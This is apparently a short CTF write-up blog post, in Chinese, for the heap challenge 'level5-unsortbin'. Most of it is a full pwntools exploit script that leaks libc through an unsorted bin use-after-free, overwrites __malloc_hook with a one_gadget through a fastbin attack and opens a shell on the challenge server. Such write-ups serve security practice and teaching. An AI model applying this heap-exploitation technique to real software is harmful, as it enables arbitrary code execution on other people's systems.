MENU

*CTF unsorted bin leak & fastbin attack level5-unsortbin Writeup

November 19, 2020 • Read: 205 • Pwn

UNCTF2020中的babyheap,官方wp用的是unsorted bin attack修改fastbin最大大小。
所以特意看了一下这题,结果发现这题是unsorted bin leak,不过不做白不做,花了一个小时做掉了。
等一下会找一下unsorted bin attack的题目
待补充...

# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
#r = process('./level5-unsortbin')
r = remote("pwn.sixstars.team", 22505)
elf = ELF('./libc.so.6')
#elf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
def add_note(size):
    r.sendlineafter(">> ", "1")
    r.sendlineafter("Size:", str(size))

def show_note(idx):
    r.sendlineafter(">> ", "2")
    r.sendlineafter("id:", str(idx))

def edit_note(idx, content):
    r.sendlineafter(">> ", "3")
    r.sendlineafter("id:", str(idx))
    r.sendlineafter("Content:", content)

def dele_note(idx):
    r.sendlineafter(">> ", "4")
    r.sendlineafter("id:", str(idx))


add_note(200)
add_note(0x68)
dele_note(0)
show_note(0)
#main_arena + 0x58 = leak addr
#main_arena - 0x10 = __malloc_hook
#__malloc_hook = leak_addr - 0x68
malloc_hook_addr = u64(r.recv(6).ljust(8, '\x00')) - 0x68
libc_base = malloc_hook_addr - elf.sym['__malloc_hook']

one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one_gadget = libc_base + one[2]
print "__malloc_hook: " + hex(malloc_hook_addr)
print "one_gadget: " + hex(one_gadget)

dele_note(1)
edit_note(1, p64(malloc_hook_addr - 0x23))
add_note(0x68)
add_note(0x68)

edit_note(3, 'a' * 0x13 + p64(one_gadget))
#gdb.attach(r)
dele_note(1)
dele_note(1)
r.interactive()
Archives QR Code Tip
QR Code for this page
Tipping QR Code